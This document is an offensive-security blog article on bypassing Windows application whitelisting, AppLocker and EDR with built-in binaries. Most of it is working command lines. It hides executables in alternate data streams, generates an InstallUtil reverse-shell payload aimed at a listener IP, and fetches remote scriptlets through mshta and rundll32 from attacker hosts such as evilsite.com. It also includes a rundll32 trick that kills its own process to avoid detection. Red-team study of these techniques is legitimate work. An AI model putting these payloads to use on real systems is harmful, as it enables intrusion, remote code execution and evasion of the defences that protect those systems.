through a red teaming assessment you may face some of the restrictions due to policy enforcement / EDR / app whitelisting ..etc., so in this article, I am going to cover most of the techniques that may be useful to bypass environment restrictions
abusing writable paths
Table of Contents
on some of the windows ten builds there are some writable folders paths that could be harmed by changing the ownership (ACL) of the desired location which includes executing rights If binary denies executing is inherit you can either disable inheritance, or you can use the hard link to a binary
fsutil hardlink create c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe
mklink /h c:\windows\system32\fxstmp\evil.exe c:\myfolder\linked.exe
also, I highly recommend checking for writable folders with the current level of permission using the 0xsp mongoose -W option
Bypass Applications Whitelisting
Alternative Data Streams App Locker
after installation of the app locker on a windows machine the first login user will be able to access these files’ locations as below with full access
AppCache.dat
AppCache.dat.LOG1
AppCache.dat.LOG2
Code language: CSS (css)
abusing these files could be done using alternative data stream execution since the app locker locks these files. so you may need to execute the following instructions
- adding binary into the stream
type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe
Code language: CSS (css)
- calling wait to call the process
wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe
you may also consider the following list of commands with the same scope of attack methodology
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct ^scrobj.dll > fakefile.doc:reg32.bat
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns
Code language: JavaScript (javascript)
Installutil.exe (T1118)
a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
we can use this technique to generate C# shellcode with this tool, then we can upload the generated file into the target machine
python InstallUtil.py --cs_file temp.cs --exe_file temp.exe --payload windows/shell_reverse_tcp --lhost 192.168.68.104 --lport 443
compile C# code using cs.exe
csc.exe temp.cs
Code language: CSS (css)
finally, you can execute the payload with the following command
.\InstallUtil.exe /logfile= /LogToConsole=false /U temp.cs
Code language: JavaScript (javascript)
Presentationhost.exe (T1218)
The presentation host is a built-in windows executable that used as Proxy execution of code through XAML Browser Application, by loading xbap file into a specific process. opening a .xbap file appears to launch the application inside Internet Explorer, but the code is running in another process (Presentationhost.exe) for POC demonstration you may use the following code
private void Button_click(object sender, RoutedEventArgs e)
{
if (RadioButton1.IsChecked == true)
{
Process.Start("C:\\poc\\evil.exe");
MessageBox.Show("BHello.");
}
}
Code language: JavaScript (javascript)
then you can execute the following payload
Presentationhost.exe file:///tmp/poc.xbap
Code language: JavaScript (javascript)
also put into consideration that in case it doesn’t work due to security validation it is better to do it through visual studio you can check out this article
Regsvcs.exe / Regasm (T1121)
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies.
demonstration of this attack by executing the following commands
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file}
Code language: PHP (php)
you may also achieve that by executing some of the PowerShell command lines
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library /keyfile:$env:Temp\key.snk #{source_file}
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{output_file}
Code language: PHP (php)
Mshta.exe (T1170)
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications).
from different aspects we can use this utility to launch a different kind of attacks that could bypass restrictions made into an environment, the first common one is by using scriptlet file .sct
let us first generate our payload to use
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript"></script>
</scriptlet
Code language: HTML, XML (xml)
then save it as payload.sct for an example, after that you can simply call it through mshta process
mshta.exe javascript:a=(GetObject("script:http://192.168.68.104/payload.sct")).Exec();close();
Code language: JavaScript (javascript)
Rundll32
as well known this can be used differently, the first command is using DLL with slandered UNC path, but in this case, we are using rundll32 to execute a payload stored in WebDAV server
rundll32 \\webdavserver\folder\payload.dll,entrypoint
Code language: CSS (css)
the other payload is by calling inline-script also using payload.sct that we used before
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
Code language: JavaScript (javascript)
we can also consider using this tricky payload to execute a process and then killing the rundll32.exe process after final execution, that’s very helpful to avoid detection in some cases
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
Code language: JavaScript (javascript)
while on the other hand we still can use rundll32 to bypass the restriction by creating a process depending on the registered system DLLs entry points
rundll32.exe advpack.dll,RegisterOCX calc.exe
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
rundll32.exe url.dll, FileProtocolHandler calc.exe
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
rundll32.exe ieadvpack.dll,LaunchINFSection test.i
Code language: CSS (css)
offensive security expert and founder of 0xsp security research and development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED, and many other open-source projects